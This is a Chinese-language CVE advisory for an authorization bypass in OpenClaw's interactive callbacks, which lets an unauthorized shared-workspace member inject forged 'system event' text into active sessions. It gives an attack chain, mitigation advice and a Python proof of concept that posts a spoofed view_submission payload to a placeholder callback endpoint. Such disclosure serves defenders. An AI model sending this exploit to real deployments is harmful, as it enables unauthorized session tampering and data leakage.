CVE-2026-32005 CVSS 6.8 中危

CVE-2026-32005 OpenClaw交互回调授权绕过漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32005

漏洞类型

权限绕过

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.2.25之前的版本中存在严重的安全缺陷，未能对交互式回调（包括block_action、view_submission和view_closed）实施严格的发送者授权检查。在共享工作区的部署场景下，未经授权的工作区成员利用此漏洞可成功绕过allowFrom限制以及频道用户允许列表。这使得攻击者能够将系统事件文本非法排队并注入到活动会话中，导致数据完整性受损及潜在的敏感信息泄露，CVSS评分为6.8（中危）。

技术细节

该漏洞的核心原因在于OpenClaw处理特定交互式回调时逻辑缺陷。当应用部署于共享工作区环境，且版本低于2026.2.25时，系统在解析block_action、view_submission及view_closed等事件时，未正确验证回调请求的发送者身份。根据CVSS向量分析，攻击者仅需具备低权限账号（PR:L）即可通过网络（AV:N）发起攻击，无需诱导用户交互（UI:N）。利用过程涉及构造恶意的HTTP请求包，模拟合法的回调载荷，由于系统跳过了allowFrom和白名单验证机制，攻击者能够欺骗系统接受这些请求。后果是攻击者可将任意文本作为系统事件插入活动会话流中，这不仅破坏了会话的完整性（I:H），还可能导致机密信息泄露（C:H），从而完全控制会话上下文。

攻击链分析

STEP 1

侦察

攻击者识别出目标组织使用了存在漏洞的OpenClaw版本（<2026.2.25），并获取了该共享工作区的低权限成员账号。

STEP 2

利用

攻击者向OpenClaw的交互回调端点发送特制的HTTP POST请求，伪装成block_action或view_submission事件，利用漏洞绕过allowFrom和用户白名单检查。

STEP 3

注入

由于发送者授权检查被跳过，系统接受请求并将攻击者构造的“系统事件文本”排队加入到活动会话中。

STEP 4

影响

恶意文本在会话中作为系统指令或消息被执行或显示，导致会话完整性被破坏，可能引发进一步的信息泄露或误导操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable OpenClaw instance callback endpoint
target_url = "https://target-openclaw-instance.com/api/v1/callbacks/interactive"

# Malicious payload simulating a view_submission event
# The vulnerability allows bypassing the sender check, so attacker_id is arbitrary
payload = {
    "type": "view_submission",
    "team": {"id": "T_SHARED_WORKSPACE_ID"},
    "user": {"id": "U_UNAUTHORIZED_MEMBER_ID"},
    "api_app_id": "A_OPENCLAW_APP_ID",
    "token": "LEGACY_TOKEN", 
    "trigger_id": "TRIGGER_ID",
    "view": {
        "callback_id": "inject_event",
        "state": {
            "values": {
                "block_action": {
                    "action_input": {
                        "type": "plain_text_input",
                        "value": "SYSTEM_EVENT: Malicious command injected"
                    }
                }
            }
        }
    }
}

# Sending the request to exploit the authorization bypass
headers = {"Content-Type": "application/json"}
try:
    response = requests.post(target_url, json=payload, headers=headers)
    if response.status_code == 200:
        print("[+] PoC successful: System event text injected into active session.")
    else:
        print(f"[-] PoC failed: Server returned status code {response.status_code}")
except Exception as e:
    print(f"[-] Error during request: {e}")

影响范围

OpenClaw < 2026.2.25

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用共享工作区部署中的交互式回调功能，或通过Web应用防火墙（WAF）实施严格的入站请求验证，确保只有经过验证的IP地址或包含特定签名令牌的请求才能访问回调API。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表